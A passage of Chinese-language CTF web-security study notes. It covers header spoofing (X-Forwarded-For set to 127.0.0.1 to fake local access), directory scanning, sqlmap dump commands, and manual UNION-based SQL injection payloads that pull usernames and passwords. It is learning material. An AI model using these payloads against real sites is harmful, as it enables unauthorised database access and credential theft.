工具
firefox的hackbar插件,bp,kali-linux,蚁剑,7kbscan等
抓包修改BP,hackbar
通过hackbar传入get,post参数,例如?name1=value1&name2=value2,url后添加文件路径,可以访问相应的文件,404not found;403越权访问;200 ok
http
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段
X-Forwarded-For:127.0.0.1 即为仿造本地访问
client-ip: 127.0.0.1同样可以伪造本地访问
Referer 是存在于http请求头内部的用于标识访问者来源网页的标识字段,即来时的路
User-Agent也简称UA。用较为普通的一点来说,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识。UA字符串在每次浏览器 HTTP 请求时发送到服务器
ua字段修改为Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/1A542a Safari/419.3为移动端iphone访问
via字段为代理服务器地址
目录扫描7kbscan,kali-linux下的dirsearch
7kbascan直接输入url
dirsearch -u [url]
在扫描出403forbidden时可以进一步扫描目录,可能会有新的发现
sql注入,sqlmap
检查是否有注入,并可获得sql软件类型
sqlmap -u [url]
查看包含数据库
sqlmap -u [url] --dbs
查看数据库中的表
sqlmap -u [url] -D [dsbname] -tables
查看表中的列名
sqlmap -u [url] -D [dbsname] -T [tablename] -columns
查看列中的数据
sqlmap -u [url] -D [dbsname] -T [tablename] -C [cname],[cname] --dump
sql手注流程
1.首先判断是字符型还是数字型注入
(数字型)
2.判断显示字段的数目
?id=1 order by 1
3.判断报错点
?id=1 and 1=2 union select 1,2,3
4.获取当前数据库名字
?id=1 and 1=2 union select 1, concat_ws(char(32,58,32),user(),database(),version()),3
5.获取数据库中的表名
?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfswiki'
6.获取表中的列名
?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfswiki' and table_name='user'
7.获取列中的数据
?id=1 and 1=2 union select 1,group_concat(username,' ',password),3 from user
(字符型)
2.判断显示字段的数目
?id=1' order by 1#
3.判断报错点
?id=1' and '1'='2' union select 1,2,3#
4.获取当前数据库名字
?id=1' and '1'='2' union select 1, concat_ws(char(32,58,32),user(),database(),version()),3#
5.获取数据库中的表名
?id=1' and '1'='2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfswiki'#
6.获取表中的列名
?id=1' and '1'='2' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfswiki' a